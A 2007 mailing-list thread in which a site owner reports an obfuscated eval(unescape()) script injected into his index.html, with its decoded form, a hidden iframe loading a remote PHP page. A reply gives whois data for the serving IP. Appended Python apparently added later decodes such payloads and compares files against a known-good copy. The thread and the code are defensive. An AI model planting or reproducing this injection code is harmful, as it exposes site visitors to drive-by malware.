[ale] I've been hacked!
Adrin
adrin at bellsouth.net
Wed Nov 21 18:33:42 EST 2007
whois 69.73.146.142
OrgName: Jaguar Technologies LLC
OrgID: JTL-8
Address: 4201 SW Freeway suite#216
City: Houston
StateProv: TX
PostalCode: 77027
Country: US
NetRange: 69.73.128.0 - 69.73.191.255
CIDR: 69.73.128.0/18
NetName: JAGUAR-TECHNOLOGIES-NOC
NetHandle: NET-69-73-128-0-1
Parent: NET-69-0-0-0-0
NetType: Direct Allocation
NameServer: NS.NOCDIRECT.COM
NameServer: NS2.NOCDIRECT.COM
Comment: NOCDIRECT
RegDate: 2003-11-05
Updated: 2005-04-15
RAbuseHandle: ABUSE370-ARIN
RAbuseName: Abuse
RAbusePhone: +1-713-960-1502
RAbuseEmail: abuse at jaguarpc.com
OrgTechHandle: GL538-ARIN
OrgTechName: Landis, Greg
OrgTechPhone: +1-832-279-5529
OrgTechEmail: greg at jaguarpc.com
# ARIN WHOIS database, last updated 2007-11-20 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
I seem to recall that IIS has/had a hosting bug of some type. From what
I remember one virtual hosting domain could infect another on the same
server. I wish I could remember where I read about it. I remember
mostly that it was a RED HAT hosting site that had switched to M$ because
of SCO lawyers.
On Wed, 2007-11-21 at 06:57 -0500, Jim Lynch wrote:
> Last summer I received notification from Google that a web page on one
> of my web hosting accounts was infected with some sort of malware bug.
>
> This account only has ftp access so I changed the password for the one
> and only ftp account and removed the offending code from my index.html
> file. I also added a cron job to another site to compare a good
> index.html with the one on the site that had been hacked in case they
> came back.
>
> They did.
>
> Today I received a message that said the compare failed and found the
> following at the top of the body in my index.html file:
>
> <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%62%37%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%36%39%2e%37%33%2e%31%34%36%2e%31%34%32%2f%7e%61%62%6f%75%6e%64%69%6e%2f%69%6d%61%67%65%73%2f%66%72%74%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%36%36%38%33%29%2b%27%61%39%62%5c%27%20%77%69%64%74%68%3d%33%35%31%20%68%65%69%67%68%74%3d%31%33%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));
> </script>
>
> That script, unescaped looks like:
>
> window.status='Done';document.write('<iframe name=7b73
> src=\'http://69.73.146.142/~aboundin/images/frt.php?'+Math.round(Math.random()*46683)+'a9b\'
> width=351 height=133 style=\'display: none\'></iframe>'
>
> Has anyone seen anything like this before? I wonder what sort of evil
> function it might perform?
>
> I also wonder how they got access the second time? I went through the
> cgi scripts on that system to be sure they were mine. There aren't any
> php files on the system.
>
> I attempted to look up the IP address but nslookup said it didn't exist,
> however it pings and the index.html file from it is the default apache2
> index file. I suspect that system has been hacked as well.
>
> Note the incident from last Summer was a different one.
>
> Thanks,
> Jim.
>
>
> _______________________________________________
> Ale mailing list
> Ale at ale.org
> http://www.ale.org/mailman/listinfo/ale
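A defender-side check for the kind of injection Jim describes: decode any eval(unescape("...")) block in a page, report which hosts the decoded script would load into hidden iframes, and do the known-good comparison his cron job does. This is an added example, not code from the post; the sample page is constructed here by re-encoding the decoded script quoted above, and the page layout around it is made up.

```python
import hashlib
import re

# Constructed sample: the hidden-iframe loader quoted in the post, re-encoded the way
# the injected <script> carried it (every character as %XX) inside an otherwise clean page.
INJECTED_JS = ("window.status='Done';document.write('<iframe name=7b73 "
               "src=\\'http://69.73.146.142/~aboundin/images/frt.php?'"
               "+Math.round(Math.random()*46683)+'a9b\\' "
               "width=351 height=133 style=\\'display: none\\'></iframe>')")

def percent_encode_all(s):
    """Encode every character as %XX, the form seen in the injected script."""
    return "".join(f"%{ord(c):02x}" for c in s)

CLEAN_HTML = "<html><body><h1>Welcome</h1></body></html>"  # constructed known-good page
TAMPERED_HTML = ('<html><body><script>eval(unescape("' + percent_encode_all(INJECTED_JS)
                 + '"));</script><h1>Welcome</h1></body></html>')

EVAL_UNESCAPE = re.compile(r"""eval\s*\(\s*unescape\s*\(\s*["']([^"']*)["']\s*\)\s*\)""", re.I)
# An <iframe> whose src is an absolute URL and whose attributes include display: none.
HIDDEN_IFRAME = re.compile(
    r"""<iframe\b[^>]*?src=\\?['"]?(https?://[^'"\\\s>]+)[^>]*?display:\s*none""", re.I)
HOST = re.compile(r"https?://([^/:?#]+)")

def js_unescape(s):
    """Decode JavaScript unescape(): %uXXXX and %XX sequences; other text passes through."""
    return re.sub(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def decoded_eval_payloads(html):
    """Return the decoded body of every eval(unescape("...")) block in the page."""
    return [js_unescape(enc) for enc in EVAL_UNESCAPE.findall(html)]

def hidden_iframe_hosts(js):
    """Hosts that a decoded payload would load into hidden iframes."""
    return sorted({HOST.match(url).group(1) for url in HIDDEN_IFRAME.findall(js)})

def scan_page(html):
    payloads = decoded_eval_payloads(html)
    hosts = sorted({h for p in payloads for h in hidden_iframe_hosts(p)})
    return {"encoded_evals": len(payloads), "hidden_iframe_hosts": hosts, "payloads": payloads}

def changed(known_good, current):
    """The cron-style check from the post: has the live file drifted from the known-good copy?"""
    return hashlib.sha256(known_good).digest() != hashlib.sha256(current).digest()

if __name__ == "__main__":
    report = scan_page(TAMPERED_HTML)
    print("changed since known-good:", changed(CLEAN_HTML.encode(), TAMPERED_HTML.encode()))
    print("eval(unescape()) blocks:", report["encoded_evals"])
    print("hidden iframe hosts:", ", ".join(report["hidden_iframe_hosts"]))
```

The hash comparison alone tells you the file changed; decoding the payload is what tells you where the hidden iframe points, which is the address to report to the abuse contact rather than something to visit.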